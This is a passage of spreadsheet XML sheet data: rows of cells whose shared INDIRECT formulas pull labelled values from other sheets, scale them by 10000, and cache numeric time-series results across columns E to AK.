      <c r="AI12" s="12">
        <f ca="1" t="shared" si="7"/>
        <v>13.5024337000051</v>
      </c>
      <c r="AJ12" s="12">
        <f ca="1" t="shared" si="7"/>
        <v>13.9364243000051</v>
      </c>
      <c r="AK12" s="12">
        <f ca="1" t="shared" si="7"/>
        <v>13.9364243000051</v>
      </c>
      <c r="AL12" s="7"/>
    </row>
    <row r="13" ht="16.5" customHeight="1" spans="1:38">
      <c r="A13" s="9"/>
      <c r="B13" s="10" t="s">
        <v>428</v>
      </c>
      <c r="C13" s="11"/>
      <c r="D13" s="11"/>
      <c r="E13" s="12">
        <f ca="1" t="shared" ref="E13:AK13" si="8">IF(ISERROR(INDIRECT("'"&amp;E$2&amp;"'!"&amp;$B13)),NA(),INDIRECT("'"&amp;E$2&amp;"'!"&amp;$B13))/10000</f>
        <v>0.508962</v>
      </c>
      <c r="F13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.507982</v>
      </c>
      <c r="G13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.497936</v>
      </c>
      <c r="H13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.49665</v>
      </c>
      <c r="I13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.514038</v>
      </c>
      <c r="J13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.493434</v>
      </c>
      <c r="K13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.47608</v>
      </c>
      <c r="L13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.478686</v>
      </c>
      <c r="M13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.482548</v>
      </c>
      <c r="N13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.494572</v>
      </c>
      <c r="O13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.510648</v>
      </c>
      <c r="P13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.521016</v>
      </c>
      <c r="Q13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.515812</v>
      </c>
      <c r="R13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.51684</v>
      </c>
      <c r="S13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.519906</v>
      </c>
      <c r="T13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.490596</v>
      </c>
      <c r="U13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.508504</v>
      </c>
      <c r="V13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.492834</v>
      </c>
      <c r="W13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.488188</v>
      </c>
      <c r="X13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.498242</v>
      </c>
      <c r="Y13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.535186</v>
      </c>
      <c r="Z13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.558964</v>
      </c>
      <c r="AA13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.560288</v>
      </c>
      <c r="AB13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.54914</v>
      </c>
      <c r="AC13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.584156</v>
      </c>
      <c r="AD13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.604216</v>
      </c>
      <c r="AE13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.624488</v>
      </c>
      <c r="AF13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.623504</v>
      </c>
      <c r="AG13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.626288</v>
      </c>
      <c r="AH13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.623606</v>
      </c>
      <c r="AI13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.589106</v>
      </c>
      <c r="AJ13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.589106</v>
      </c>
      <c r="AK13" s="12">
        <f ca="1" t="shared" si="8"/>
        <v>0.589106</v>
      </c>
      <c r="AL13" s="7"/>
    </row>
    <row r="14" ht="16.5" customHeight="1" spans="1:38">
      <c r="A14" s="9"/>
      <c r="B14" s="10" t="s">
        <v>429</v>
      </c>
      <c r="C14" s="11"/>
      <c r="D14" s="11"/>
      <c r="E14" s="12">
        <f ca="1" t="shared" ref="E14:AK14" si="9">IF(ISERROR(INDIRECT("'"&amp;E$2&amp;"'!"&amp;$B14)),NA(),INDIRECT("'"&amp;E$2&amp;"'!"&amp;$B14))/10000</f>
        <v>0</v>
      </c>
      <c r="F14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="G14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="H14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="I14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="J14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="K14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="L14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="M14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="N14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="O14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="P14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="Q14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="R14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="S14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="T14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="U14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="V14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="W14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="X14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="Y14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="Z14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AA14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AB14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AD14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AE14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AF14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AG14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AH14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AI14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AJ14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AK14" s="12">
        <f ca="1" t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AL14" s="7"/>
    </row>
    <row r="15" ht="16.5" customHeight="1" spans="1:38">
      <c r="A15" s="9" t="s">
        <v>430</v>
      </c>
      <c r="B15" s="10" t="s">
        <v>431</v>
      </c>
      <c r="C15" s="11" t="s">
        <v>312</v>
      </c>
      <c r="D15" s="11"/>
      <c r="E15" s="12">
        <f ca="1" t="shared" ref="E15:AK15" si="10">IF(ISERROR(INDIRECT("'"&amp;E$2&amp;"'!"&amp;$B15)),NA(),INDIRECT("'"&amp;E$2&amp;"'!"&amp;$B15))/10000</f>
        <v>8.147371</v>
      </c>
      <c r="F15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>7.999705</v>
      </c>
      <c r="G15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>7.758121</v>
      </c>
      <c r="H15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>7.553625</v>
      </c>
      <c r="I15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>7.983661</v>
      </c>
      <c r="J15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>8.015097</v>
      </c>
      <c r="K15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>8.052867</v>
      </c>
      <c r="L15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>7.884691</v>
      </c>
      <c r="M15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>7.545033</v>
      </c>
      <c r="N15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>7.410767</v>
      </c>
      <c r="O15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>7.033505</v>
      </c>
      <c r="P15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>6.892883</v>
      </c>
      <c r="Q15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>6.767855</v>
      </c>
      <c r="R15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>6.591835</v>
      </c>
      <c r="S15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>6.696569</v>
      </c>
      <c r="T15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>6.741053</v>
      </c>
      <c r="U15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>6.729127</v>
      </c>
      <c r="V15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>6.500069</v>
      </c>
      <c r="W15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>6.425901</v>
      </c>
      <c r="X15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>6.485159</v>
      </c>
      <c r="Y15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>6.514431</v>
      </c>
      <c r="Z15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>6.612936</v>
      </c>
      <c r="AA15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>6.57391</v>
      </c>
      <c r="AB15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>6.594666</v>
      </c>
      <c r="AC15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>6.50483</v>
      </c>
      <c r="AD15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>6.204132</v>
      </c>
      <c r="AE15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>5.98144</v>
      </c>
      <c r="AF15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>5.829806</v>
      </c>
      <c r="AG15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>5.655542</v>
      </c>
      <c r="AH15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>5.313312</v>
      </c>
      <c r="AI15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>4.989514</v>
      </c>
      <c r="AJ15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>4.989514</v>
      </c>
      <c r="AK15" s="12">
        <f ca="1" t="shared" si="10"/>
        <v>4.989514</v>
      </c>
      <c r="AL15" s="7"/>
    </row>
    <row r="16" ht="16.5" customHeight="1" spans="1:38">
      <c r="A16" s="9"/>
      <c r="B16" s="10" t="s">
        <v>432</v>
      </c>
      <c r="C16" s="11" t="s">
        <v>352</v>
      </c>
      <c r="D16" s="11"/>
      <c r="E16" s="12">
        <f ca="1" t="shared" ref="E16:AK16" si="11">IF(ISERROR(INDIRECT("'"&amp;E$2&amp;"'!"&amp;$B16)),NA(),INDIRECT("'"&amp;E$2&amp;"'!"&amp;$B16))/10000</f>
        <v>6.180377</v>
      </c>
      <c r="F16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>6.002835</v>
      </c>
      <c r="G16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>6.027317</v>
      </c>
      <c r="H16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>5.957003</v>
      </c>
      <c r="I16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>5.922614</v>
      </c>
      <c r="J16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>5.860371</v>
      </c>
      <c r="K16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>5.559012</v>
      </c>
      <c r="L16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>5.653344</v>
      </c>
      <c r="M16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>5.78674</v>
      </c>
      <c r="N16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>6.079501</v>
      </c>
      <c r="O16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>6.402381</v>
      </c>
      <c r="P16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>6.507767</v>
      </c>
      <c r="Q16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>6.577074</v>
      </c>
      <c r="R16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>6.685336</v>
      </c>
      <c r="S16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>6.660216</v>
      </c>
      <c r="T16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>6.504526</v>
      </c>
      <c r="U16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>6.369995</v>
      </c>
      <c r="V16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>6.598182</v>
      </c>
      <c r="W16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>6.628708</v>
      </c>
      <c r="X16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>6.576481</v>
      </c>
      <c r="Y16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>6.482791</v>
      </c>
      <c r="Z16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>6.238547</v>
      </c>
      <c r="AA16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>6.082698</v>
      </c>
      <c r="AB16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>6.028653</v>
      </c>
      <c r="AC16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>5.76807</v>
      </c>
      <c r="AD16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>5.543536</v>
      </c>
      <c r="AE16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>5.60701</v>
      </c>
      <c r="AF16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>5.412073</v>
      </c>
      <c r="AG16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>5.283648</v>
      </c>
      <c r="AH16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>5.12392</v>
      </c>
      <c r="AI16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>4.915923</v>
      </c>
      <c r="AJ16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>4.915923</v>
      </c>
      <c r="AK16" s="12">
        <f ca="1" t="shared" si="11"/>
        <v>4.915923</v>
      </c>
      <c r="AL16" s="7"/>
    </row>
    <row r="17" ht="16.5" customHeight="1" spans="1:38">
      <c r="A17" s="9"/>
      <c r="B17" s="10"/>
      <c r="C17" s="11"/>
      <c r="D17" s="11"/>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7"/>
    </row>
    <row r="18" ht="16.5" customHeight="1" spans="1:38">
      <c r="A18" s="9"/>
      <c r="B18" s="10" t="s">
        <v>433</v>
      </c>
      <c r="C18" s="11" t="s">
        <v>348</v>
      </c>
      <c r="D18" s="11"/>
      <c r="E18" s="12">
        <f ca="1" t="shared" ref="E18:E23" si="12">IF(ISERROR(INDIRECT("'"&amp;E$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;E$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.571026</v>
      </c>
      <c r="F18" s="12">
        <f ca="1" t="shared" ref="F18:F23" si="13">IF(ISERROR(INDIRECT("'"&amp;F$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;F$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.537126</v>
      </c>
      <c r="G18" s="12">
        <f ca="1" t="shared" ref="G18:G23" si="14">IF(ISERROR(INDIRECT("'"&amp;G$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;G$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.493676</v>
      </c>
      <c r="H18" s="12">
        <f ca="1" t="shared" ref="H18:H23" si="15">IF(ISERROR(INDIRECT("'"&amp;H$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;H$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.458976</v>
      </c>
      <c r="I18" s="12">
        <f ca="1" t="shared" ref="I18:I23" si="16">IF(ISERROR(INDIRECT("'"&amp;I$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;I$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.435826</v>
      </c>
      <c r="J18" s="12">
        <f ca="1" t="shared" ref="J18:J23" si="17">IF(ISERROR(INDIRECT("'"&amp;J$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;J$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.604924</v>
      </c>
      <c r="K18" s="12">
        <f ca="1" t="shared" ref="K18:K23" si="18">IF(ISERROR(INDIRECT("'"&amp;K$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;K$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.559259</v>
      </c>
      <c r="L18" s="12">
        <f ca="1" t="shared" ref="L18:L23" si="19">IF(ISERROR(INDIRECT("'"&amp;L$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;L$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.481284</v>
      </c>
      <c r="M18" s="12">
        <f ca="1" t="shared" ref="M18:M23" si="20">IF(ISERROR(INDIRECT("'"&amp;M$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;M$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.400291</v>
      </c>
      <c r="N18" s="12">
        <f ca="1" t="shared" ref="N18:N23" si="21">IF(ISERROR(INDIRECT("'"&amp;N$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;N$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.302298</v>
      </c>
      <c r="O18" s="12">
        <f ca="1" t="shared" ref="O18:O23" si="22">IF(ISERROR(INDIRECT("'"&amp;O$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;O$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.396452</v>
      </c>
      <c r="P18" s="12">
        <f ca="1" t="shared" ref="P18:P23" si="23">IF(ISERROR(INDIRECT("'"&amp;P$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;P$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.327857</v>
      </c>
      <c r="Q18" s="12">
        <f ca="1" t="shared" ref="Q18:Q23" si="24">IF(ISERROR(INDIRECT("'"&amp;Q$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;Q$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.435885</v>
      </c>
      <c r="R18" s="12">
        <f ca="1" t="shared" ref="R18:R23" si="25">IF(ISERROR(INDIRECT("'"&amp;R$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;R$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.280148</v>
      </c>
      <c r="S18" s="12">
        <f ca="1" t="shared" ref="S18:S23" si="26">IF(ISERROR(INDIRECT("'"&amp;S$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;S$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.368856</v>
      </c>
      <c r="T18" s="12">
        <f ca="1" t="shared" ref="T18:T23" si="27">IF(ISERROR(INDIRECT("'"&amp;T$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;T$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.236405</v>
      </c>
      <c r="U18" s="12">
        <f ca="1" t="shared" ref="U18:U23" si="28">IF(ISERROR(INDIRECT("'"&amp;U$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;U$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.116502</v>
      </c>
      <c r="V18" s="12">
        <f ca="1" t="shared" ref="V18:V23" si="29">IF(ISERROR(INDIRECT("'"&amp;V$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;V$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.225326</v>
      </c>
      <c r="W18" s="12">
        <f ca="1" t="shared" ref="W18:W23" si="30">IF(ISERROR(INDIRECT("'"&amp;W$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;W$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.135247</v>
      </c>
      <c r="X18" s="12">
        <f ca="1" t="shared" ref="X18:X23" si="31">IF(ISERROR(INDIRECT("'"&amp;X$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;X$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.250628</v>
      </c>
      <c r="Y18" s="12">
        <f ca="1" t="shared" ref="Y18:Y23" si="32">IF(ISERROR(INDIRECT("'"&amp;Y$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;Y$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.162821</v>
      </c>
      <c r="Z18" s="12">
        <f ca="1" t="shared" ref="Z18:Z23" si="33">IF(ISERROR(INDIRECT("'"&amp;Z$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;Z$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.032149</v>
      </c>
      <c r="AA18" s="12">
        <f ca="1" t="shared" ref="AA18:AA23" si="34">IF(ISERROR(INDIRECT("'"&amp;AA$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;AA$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.149808</v>
      </c>
      <c r="AB18" s="12">
        <f ca="1" t="shared" ref="AB18:AB23" si="35">IF(ISERROR(INDIRECT("'"&amp;AB$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;AB$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.046598</v>
      </c>
      <c r="AC18" s="12">
        <f ca="1" t="shared" ref="AC18:AC23" si="36">IF(ISERROR(INDIRECT("'"&amp;AC$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;AC$2&amp;"'!"&amp;$B18))/10000</f>
        <v>1.931861</v>
      </c>
      <c r="AD18" s="12">
        <f ca="1" t="shared" ref="AD18:AD23" si="37">IF(ISERROR(INDIRECT("'"&amp;AD$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;AD$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.12741</v>
      </c>
      <c r="AE18" s="12">
        <f ca="1" t="shared" ref="AE18:AE23" si="38">IF(ISERROR(INDIRECT("'"&amp;AE$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;AE$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.237207</v>
      </c>
      <c r="AF18" s="12">
        <f ca="1" t="shared" ref="AF18:AF23" si="39">IF(ISERROR(INDIRECT("'"&amp;AF$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;AF$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.158503</v>
      </c>
      <c r="AG18" s="12">
        <f ca="1" t="shared" ref="AG18:AG23" si="40">IF(ISERROR(INDIRECT("'"&amp;AG$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;AG$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.071795</v>
      </c>
      <c r="AH18" s="12">
        <f ca="1" t="shared" ref="AH18:AH23" si="41">IF(ISERROR(INDIRECT("'"&amp;AH$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;AH$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.213038</v>
      </c>
      <c r="AI18" s="12">
        <f ca="1" t="shared" ref="AI18:AI23" si="42">IF(ISERROR(INDIRECT("'"&amp;AI$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;AI$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.329071</v>
      </c>
      <c r="AJ18" s="12">
        <f ca="1" t="shared" ref="AJ18:AJ23" si="43">IF(ISERROR(INDIRECT("'"&amp;AJ$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;AJ$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.329071</v>
      </c>
      <c r="AK18" s="12">
        <f ca="1" t="shared" ref="AK18:AK23" si="44">IF(ISERROR(INDIRECT("'"&amp;AK$2&amp;"'!"&amp;$B18)),NA(),INDIRECT("'"&amp;AK$2&amp;"'!"&amp;$B18))/10000</f>
        <v>2.329071</v>
      </c>
      <c r="AL18" s="7"/>
    </row>
    <row r="19" ht="16.5" customHeight="1" spans="1:38">
      <c r="A19" s="9"/>
      <c r="B19" s="10" t="s">
        <v>434</v>
      </c>
      <c r="C19" s="11" t="s">
        <v>394</v>
      </c>
      <c r="D19" s="11"/>
      <c r="E19" s="12">
        <f ca="1" t="shared" si="12"/>
        <v>4.87517339999998</v>
      </c>
      <c r="F19" s="12">
        <f ca="1" t="shared" si="13"/>
        <v>4.60740039999998</v>
      </c>
      <c r="G19" s="12">
        <f ca="1" t="shared" si="14"/>
        <v>4.63488409999998</v>
      </c>
      <c r="H19" s="12">
        <f ca="1" t="shared" si="15"/>
        <v>4.88438379999998</v>
      </c>
      <c r="I19" s="12">
        <f ca="1" t="shared" si="16"/>
        <v>5.18435969999998</v>
      </c>
      <c r="J19" s="12">
        <f ca="1" t="shared" si="17"/>
        <v>5.29246769999998</v>
      </c>
      <c r="K19" s="12">
        <f ca="1" t="shared" si="18"/>
        <v>5.27002579999998</v>
      </c>
      <c r="L19" s="12">
        <f ca="1" t="shared" si="19"/>
        <v>5.29489879999998</v>
      </c>
      <c r="M19" s="12">
        <f ca="1" t="shared" si="20"/>
        <v>5.29194149999998</v>
      </c>
      <c r="N19" s="12">
        <f ca="1" t="shared" si="21"/>
        <v>4.97678449999998</v>
      </c>
      <c r="O19" s="12">
        <f ca="1" t="shared" si="22"/>
        <v>4.95935949999998</v>
      </c>
      <c r="P19" s="12">
        <f ca="1" t="shared" si="23"/>
        <v>4.90232749999998</v>
      </c>
      <c r="Q19" s="12">
        <f ca="1" t="shared" si="24"/>
        <v>4.88784639999998</v>
      </c>
      <c r="R19" s="12">
        <f ca="1" t="shared" si="25"/>
        <v>4.92974239999998</v>
      </c>
      <c r="S19" s="12">
        <f ca="1" t="shared" si="26"/>
        <v>4.75160689999998</v>
      </c>
      <c r="T19" s="12">
        <f ca="1" t="shared" si="27"/>
        <v>4.39820589999998</v>
      </c>
      <c r="U19" s="12">
        <f ca="1" t="shared" si="28"/>
        <v>4.13499329999998</v>
      </c>
      <c r="V19" s="12">
        <f ca="1" t="shared" si="29"/>
        <v>3.75950419999998</v>
      </c>
      <c r="W19" s="12">
        <f ca="1" t="shared" si="30"/>
        <v>3.25270149999998</v>
      </c>
      <c r="X19" s="12">
        <f ca="1" t="shared" si="31"/>
        <v>2.89145049999998</v>
      </c>
      <c r="Y19" s="12">
        <f ca="1" t="shared" si="32"/>
        <v>2.71019049999998</v>
      </c>
      <c r="Z19" s="12">
        <f ca="1" t="shared" si="33"/>
        <v>2.79914849999998</v>
      </c>
      <c r="AA19" s="12">
        <f ca="1" t="shared" si="34"/>
        <v>2.86959489999998</v>
      </c>
      <c r="AB19" s="12">
        <f ca="1" t="shared" si="35"/>
        <v>2.97227069999998</v>
      </c>
      <c r="AC19" s="12">
        <f ca="1" t="shared" si="36"/>
        <v>2.90910169999998</v>
      </c>
      <c r="AD19" s="12">
        <f ca="1" t="shared" si="37"/>
        <v>3.17261169999998</v>
      </c>
      <c r="AE19" s="12">
        <f ca="1" t="shared" si="38"/>
        <v>3.22355269999998</v>
      </c>
      <c r="AF19" s="12">
        <f ca="1" t="shared" si="39"/>
        <v>3.32041399999998</v>
      </c>
      <c r="AG19" s="12">
        <f ca="1" t="shared" si="40"/>
        <v>3.29631999999998</v>
      </c>
      <c r="AH19" s="12">
        <f ca="1" t="shared" si="41"/>
        <v>3.46119019999998</v>
      </c>
      <c r="AI19" s="12">
        <f ca="1" t="shared" si="42"/>
        <v>3.58576689999998</v>
      </c>
      <c r="AJ19" s="12">
        <f ca="1" t="shared" si="43"/>
        <v>3.63576689999998</v>
      </c>
      <c r="AK19" s="12">
        <f ca="1" t="shared" si="44"/>
        <v>3.63576689999998</v>
      </c>
      <c r="AL19" s="7"/>
    </row>
    <row r="20" ht="16.5" customHeight="1" spans="1:38">
      <c r="A20" s="9"/>
      <c r="B20" s="10" t="s">
        <v>435</v>
      </c>
      <c r="C20" s="11" t="s">
        <v>262</v>
      </c>
      <c r="D20" s="11"/>
      <c r="E20" s="12">
        <f ca="1" t="shared" si="12"/>
        <v>3.72303399999999</v>
      </c>
      <c r="F20" s="12">
        <f ca="1" t="shared" si="13"/>
        <v>3.58647099999999</v>
      </c>
      <c r="G20" s="12">
        <f ca="1" t="shared" si="14"/>
        <v>3.50020899999999</v>
      </c>
      <c r="H20" s="12">
        <f ca="1" t="shared" si="15"/>
        <v>3.61428999999999</v>
      </c>
      <c r="I20" s="12">
        <f ca="1" t="shared" si="16"/>
        <v>3.44969899999999</v>
      </c>
      <c r="J20" s="12">
        <f ca="1" t="shared" si="17"/>
        <v>3.63576599999999</v>
      </c>
      <c r="K20" s="12">
